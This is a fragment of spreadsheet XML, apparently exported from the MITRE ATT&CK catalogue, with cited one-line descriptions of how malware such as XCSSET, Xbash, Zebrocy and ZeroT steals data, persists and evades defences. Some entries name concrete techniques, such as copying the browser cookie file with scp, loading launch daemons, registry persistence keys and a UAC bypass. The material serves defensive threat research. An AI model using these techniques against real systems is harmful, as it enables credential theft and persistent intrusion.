    <t>[XCSSET](https://attack.mitre.org/software/S0658) collects contacts and application data from files in Desktop, Documents, Downloads, Dropbox, and WeChat folders.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--71c512cd-2372-400e-92ea-2c84760b81f5</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) adds malicious file paths to the &lt;code&gt;DYLD_FRAMEWORK_PATH&lt;/code&gt; and &lt;code&gt;DYLD_LIBRARY_PATH&lt;/code&gt; environment variables to execute malicious code.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--7af3fbea-cdb1-42e3-a5f0-8ad2e418baff</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) exfiltrates data stolen from a system over its C2 channel.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--399b8688-1fe9-4fa6-a984-7c01f9319a38</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) has used a zero-day exploit in the ssh launchdaemon to elevate privileges and bypass SIP.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--b26307f7-2d5a-4139-8333-e2c7a583f939</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) has used `mdfind` to enumerate a list of apps known to grant screen sharing permissions.(Citation: Application Bundle Manipulation Brandon Dalton)</t>
  </si>
  <si>
    <t>relationship--de15c868-b002-415c-937b-b365e4c60597</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) prompts the user to input credentials using a native macOS dialog box leveraging the system process &lt;code&gt;/Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--b019c5ea-be5e-453a-9ed6-e86384c92259</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</si>
  <si>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</si>
  <si>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relationship--3a72e519-b85c-4dec-9ffd-74eec8af03ca</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses a hidden folder named &lt;code&gt;.xcassets&lt;/code&gt; and &lt;code&gt;.git&lt;/code&gt; to embed itself in Xcode.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--05ee3203-83ad-4dd3-8590-b7f3ffcf772a</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</si>
  <si>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</si>
  <si>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relationship--30e190f8-2f7d-4795-9bed-90576fafdd0b</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--ce0e6abe-ebdb-45f4-a403-261587e0fa0f</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) loads a system level launchdaemon using the &lt;code&gt;launchctl load -w&lt;/code&gt; command from &lt;code&gt;/System/Librarby/LaunchDaemons/ssh.plist&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--b502aff3-128e-4715-a8bc-7b7b8fa0be74</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses the &lt;code&gt;chmod +x&lt;/code&gt; command to grant executable permissions to the malicious file.(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>relationship--9021af47-45ef-4021-a697-d76ccb790f07</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) builds a malicious application bundle to resemble Safari through using the Safari icon and &lt;code&gt;Info.plist&lt;/code&gt;. (Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--51650560-9aff-460b-9766-14c83bdb2198</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</si>
  <si>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</si>
  <si>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relationship--d4992852-13b0-4bfb-aee3-09d658a52785</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</si>
  <si>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</si>
  <si>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relationship--5b6ff16b-9958-432c-bad9-5260d549117a</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) saves a screen capture of the victim's system with a numbered filename and &lt;code&gt;.jpg&lt;/code&gt; extension. Screen captures are taken at specified intervals based on the system. (Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--f53a225d-093b-4d90-9916-1e5981dbf95a</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</si>
  <si>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</si>
  <si>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relationship--b655c9e9-a6c1-42e9-9df7-60ab64b7f65a</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</si>
  <si>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</si>
  <si>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relationship--0ecc1e3a-340a-42b6-9739-c6a243ffaa8f</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses &lt;code&gt;scp&lt;/code&gt; to access the &lt;code&gt;~/Library/Cookies/Cookies.binarycookies&lt;/code&gt; file.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--acfadf9a-afa5-413e-8855-a96947c5ab26</t>
  </si>
  <si>
    <t xml:space="preserve">[XCSSET](https://attack.mitre.org/software/S0658) uses RC4 encryption over TCP to communicate with its C2 server.(Citation: trendmicro xcsset xcode project 2020)  </t>
  </si>
  <si>
    <t>relationship--78adc73a-0f8c-498e-9451-7f9081f81595</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) identifies the macOS version and uses &lt;code&gt;ioreg&lt;/code&gt; to determine serial number.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--cb37da3b-6ffd-4882-9680-4e467f25d7f4</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses AppleScript to check the host's language and location with the command &lt;code&gt;user locale of (get system info)&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--1878edcb-e458-494c-81a5-34d8a0390957</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</si>
  <si>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</si>
  <si>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relationship--e1ee2aae-72b0-4258-abab-2705d6b9268a</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses a shell script to execute Mach-o files and &lt;code&gt;osacompile&lt;/code&gt; commands such as, &lt;code&gt;osacompile -x -o xcode.app main.applescript&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--de1f13d3-a6a0-4170-947d-81b59d1262ef</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) uses SSL/TLS and RC4 to encrypt traffic.(Citation: Invincea XTunnel)(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--b3973baa-0185-45a1-934d-2b29f742a2df</t>
  </si>
  <si>
    <t>A version of [XTunnel](https://attack.mitre.org/software/S0117) introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--0c143634-89e1-47a0-9044-4ca39ccff76a</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) is capable of accessing locally stored passwords on victims.(Citation: Invincea XTunnel)</t>
  </si>
  <si>
    <t>relationship--044ad6d3-9389-4764-9b96-ad53dc98840d</t>
  </si>
  <si>
    <t>The C2 server used by [XTunnel](https://attack.mitre.org/software/S0117) provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--e97b39d6-7be1-4f59-8959-7f1f01402152</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) is capable of probing the network for open ports.(Citation: Invincea XTunnel)</t>
  </si>
  <si>
    <t>relationship--a423dc5c-c506-4cc5-b65c-0c9269d18fb6</t>
  </si>
  <si>
    <t>A version of [XTunnel](https://attack.mitre.org/software/S0117) introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--e8d2c3f1-7c86-438c-bead-6a86f9a36463</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) relays traffic between a C2 server and a victim.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>relationship--d3234cf8-0ef7-4447-ae3a-9624f3229265</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) has been used to execute remote commands.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>relationship--3264e1db-0f54-4049-a45c-3a03a24709aa</t>
  </si>
  <si>
    <t>S0341</t>
  </si>
  <si>
    <t>Xbash</t>
  </si>
  <si>
    <t>malware--6a92d80f-cc65-45f6-aa66-3cdea6786b3c</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can create a cronjob for persistence if it determines it is on a Linux system.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--52c32b71-1b7c-45e9-b082-7f3f16b90f2b</t>
  </si>
  <si>
    <t xml:space="preserve">[Xbash](https://attack.mitre.org/software/S0341) has destroyed Linux-based databases as part of its ransomware capabilities.(Citation: Unit42 Xbash Sept 2018)	</t>
  </si>
  <si>
    <t>relationship--1c8208ad-b295-4e39-a928-40fc49f68fb4</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--98ccbadd-dbfa-44d3-b3f2-3a55c8fa37e1</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can obtain a webpage hosted on Pastebin to update its C2 domain list.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--fc56f0e8-e059-403a-88e4-bd0b61bbc4b7</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.(Citation: Unit42 Xbash Sept 2018)(Citation: Trend Micro Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--6706d89e-27dd-48bb-ae0b-db51e07cbc91</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can download additional malicious files from its C2 server.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--809ffec1-52a1-45a5-b410-049352b99700</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can execute malicious JavaScript payloads on the victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--8dd45f3b-a005-40b3-a6ef-c1ef208e8504</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use mshta for executing scripts.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--2ed3ed76-7ebe-4371-a7e9-cc5a45ace915</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can perform port scanning of TCP and UDP ports.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--9409dcff-0ddf-43f6-b7c0-937fd9216ee0</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.(Citation: Unit42 Xbash Sept 2018)(Citation: Trend Micro Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--e9de3c2d-1b2e-4c35-a406-475f5f5fd4d5</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--8a8068fb-7cf9-4ab6-92a7-e8b3ecdf578d</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can create a Startup item for persistence if it determines it is on a Windows system.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--3341ad26-c7a8-4e42-a095-a49e65fde843</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use regsvr32 for executing scripts.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--ee9da7e8-12a5-4b77-84ce-a5453874a070</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can collect IP addresses and local intranet information from a victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--f5548cf6-d6d8-401e-997c-ee72642d691c</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can execute malicious VBScript payloads on the victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--21117898-adc0-41c1-9e2e-2551e638ef71</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) uses HTTP for C2 communications.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>relationship--06eac254-32a7-4e32-97b2-c46f79b4adb3</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) decrypts downloaded files before execution.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>relationship--74e1dbd9-baad-488f-9b30-4430420e15d3</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP GET requests to download other files that are executed in memory.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>relationship--1729ebeb-c92c-4d8e-a859-0d081b3821a1</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) encrypts its configuration file using a simple algorithm.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>relationship--93b3993d-0345-434e-9b0a-4dfd8efa6c99</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) checks for antimalware solution processes on the system.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>relationship--618d4835-6022-46df-bee1-38fcb97ffb91</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) checks for the system’s Windows OS version and hostname.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>relationship--01c60a20-2eff-4b4e-a15a-24e56a487b4e</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP for C2.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>relationship--78e60e86-72a0-4966-a1b9-19a76102d78f</t>
  </si>
  <si>
    <t>The [ZLib](https://attack.mitre.org/software/S0086) backdoor compresses communications using the standard Zlib compression library.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--32568a57-ff9c-42f5-9b60-0b78d7b0a7c0</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has sent data and files from a compromised host to its C2 servers.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--e9e70d42-7810-4175-aea5-509a6541f4dd</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to enumerate files and drives.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--50271beb-48b1-411e-86b5-990b4cbb1fb5</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to download files.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--2025480a-6d91-4ef5-a6ea-cc025c8aecfb</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--fb9cf04b-ad28-472a-9ee3-a2e744e0e122</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to obtain screenshots of the compromised system.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--7296e1e2-514d-4a6c-a1fe-18558a5e3b0f</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to enumerate system information.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--3126c7fa-02eb-475f-a474-26d4d6af7a67</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to discover and manipulate Windows services.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--b7601a08-a52d-4daa-acb9-2f5e3392b6c3</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) communicates over HTTP for C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--fb11df98-790a-4b1c-9ca0-73224226cff3</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to execute shell commands.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--98a9bef7-8aff-4cbb-958b-14cb72954b8a</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) creates Registry keys to allow itself to run as various services.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--3f02c07f-663f-4c54-b7e0-c2b2dbe82335</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</si>
  <si>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</si>
  <si>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relationship--960accee-d5ea-4570-8697-84ada0cc266a</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) uses SSL and AES ECB for encrypting C2 communications.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>relationship--bcb137f0-e92d-47b5-912f-ba8d4f9ff15c</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</si>
  <si>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</si>
  <si>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relationship--e9a4ceb4-ed33-48c4-b1f3-f73883b0e207</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>relationship--4f550078-32b1-4abb-aa90-0e9fb7cc45f9</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has the capability to upload dumper tools that extract credentials from web browsers and store them in database files.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>relationship--fd9b9c3a-544b-43e1-b4f4-aab6e646eb31</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) decodes its secondary payload and writes it to the victim’s machine. [Zebrocy](https://attack.mitre.org/software/S0251) also uses AES and XOR to decrypt strings and payloads.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t>relationship--e3be5269-92fd-488e-be35-ddc91030f7c3</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) has exfiltrated data to the designated C2 server using HTTP POST requests.(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>relationship--546fc347-7844-4721-8ec4-dbf45e8ca1e7</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has a command to delete files and directories.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>relationship--c56a229c-f033-4a51-ad5c-251dff28b87e</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</si>
  <si>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</si>
  <si>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relationship--86b7bab7-a1d6-4820-be55-c379f3967f1a</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</si>
  <si>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</si>
  <si>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relationship--24bf6b49-b492-44b0-bcc9-37bfba489d62</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) stores all collected information in a single file before exfiltration.(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t>relationship--c4a2a14a-6fb0-46cf-b97d-c4bcb1c751a7</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) performs persistence with a logon script via adding to the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t>relationship--a0f218db-2d79-43b7-b2b8-ef1199ada766</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses SMTP and POP3 for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>relationship--68a91212-caee-45f3-ba09-95ed43f80af6</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) identifies network drives when they are added to victim systems.(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>relationship--e27ebd5b-4ed3-4c04-96e3-026bd127ed64</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) enumerates information about connected storage devices.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>relationship--45f3afcd-d0b7-494b-a61a-cad724dbf72a</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</si>
  <si>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</si>
  <si>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relationship--1051f320-91fa-4f89-8abe-a851a56e18a7</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) executes the &lt;code&gt;reg query&lt;/code&gt; command to obtain information in the Registry.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>relationship--c4e03a2f-3617-4017-8dab-8904b1060c87</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) creates an entry in a Registry Run key for the malware to execute on startup.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>relationship--8839b4ad-24cb-4ad3-a407-947f75591973</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has a command to create a scheduled task for persistence.(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>relationship--f957f429-c0d1-4b02-aef8-1d8500421225</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</si>
  <si>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</si>
  <si>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relationship--3e2d4ce8-0006-4571-b8ea-dbfc4bf7302f</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251)'s Delphi variant was packed with UPX.(Citation: Unit42 Sofacy Dec 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>relationship--895a3c63-26d1-4846-8b8d-8f6b2c266910</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has used URL/Percent Encoding on data exfiltrated via HTTP POST requests.(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>relationship--d514d73a-27de-409d-bff9-d7e48f2859a6</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</si>
  <si>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</si>
  <si>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relationship--6216dadc-095e-4550-bc01-79c79fe614ba</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) runs the &lt;code&gt;ipconfig /all&lt;/code&gt; command.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>relationship--7c18e59d-3448-462c-aaa7-bf03b9ea5780</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses &lt;code&gt;netstat -aon&lt;/code&gt; to gather network connection information.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>relationship--1df5eebc-94f5-44ae-8feb-8d3a89fbfc4e</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) gets the username from the system.(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>relationship--46452566-0f0f-4fe9-9cef-ef7e3d6eee36</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) gathers the current time zone and date information from the system.(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>relationship--07eea18c-048c-4187-a6f1-ca97e9bfc846</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses HTTP for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>relationship--6d102ef8-c831-413d-b2cb-392517638b0b</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) uses cmd.exe to execute commands on the system.(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>relationship--b7cd3903-1b6d-4163-b7cf-97dbdeefda05</t>
  </si>
  <si>
    <t>One variant of [Zebrocy](https://attack.mitre.org/software/S0251) uses WMI queries to gather information.(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>relationship--16e1d79d-1eb9-4ce7-a21e-115ce2a414f1</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has obfuscated DLLs and functions using dummy API calls inserted between real instructions.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--47df35dd-7d45-452d-af46-d04348a6b363</t>
  </si>
  <si>
    <t>Many [ZeroT](https://attack.mitre.org/software/S0230) samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--1c395bb3-3b16-422f-bb00-9048b67b2337</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used DLL side-loading to load malicious payloads.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--4a4664c1-47dd-4a4a-ab7b-0f64ec137a67</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) shellcode decrypts and decompresses its RC4-encrypted payload.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--026a63ae-dd3d-4ea6-8a32-c40c9b37b893</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) can download additional payloads onto the victim.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--bff3220c-6fea-4925-a9d0-46f06efb7337</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has encrypted its payload with RC4.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--fee82671-3bba-48c7-bef8-63b2b2bb0fa7</t>
  </si>
  <si>
    <t>Some [ZeroT](https://attack.mitre.org/software/S0230) DLL files have been packed with UPX.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--b703258a-ea4b-4778-9b98-b053bd16a959</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has retrieved stage 2 payloads as Bitmap images that use Least Significant Bit (LSB) steganography.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--84f88ed3-28fe-4936-8ea2-2d4f6d015c0c</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used RC4 to encrypt C2 traffic.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--cf8f6cd4-cd87-430b-b286-3790c5a97efa</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--7bb2d594-36dc-458d-9f9b-8a3df42fac67</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) gathers the victim's IP address and domain information, and then sends it to its C2 server.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--5d818f5b-6145-4d8f-9be2-2d12fc1f71f1</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used HTTP for C2.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--a549ccf7-8610-4cf8-80d7-98491566c0cd</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) can add a new service to ensure [PlugX](https://attack.mitre.org/software/S0013) persists on the system when delivered as another payload onto the system.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>relationship--1d3c31c2-6756-483a-8aee-736bac591c1a</t>
  </si>
  <si>
    <t>S0027</t>
  </si>
  <si>
    <t>Zeroaccess</t>
  </si>
  <si>
    <t>malware--552462b9-ae79-49dd-855c-5973014e157f</t>
  </si>
  <si>
    <t>Some variants of the [Zeroaccess](https://attack.mitre.org/software/S0027) Trojan have been known to store data in Extended Attributes.(Citation: Ciubotariu 2014)</t>
  </si>
  <si>
    <t>relationship--e584ec5f-af99-4d61-8b02-3dbacae4adf4</t>
  </si>
  <si>
    <t>[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode rootkit.(Citation: Sophos ZeroAccess)</t>
  </si>
  <si>
    <t>relationship--da6aa745-9eb5-44d9-80f8-e9f542d106d2</t>
  </si>
  <si>
    <t>S0330</t>
  </si>
  <si>
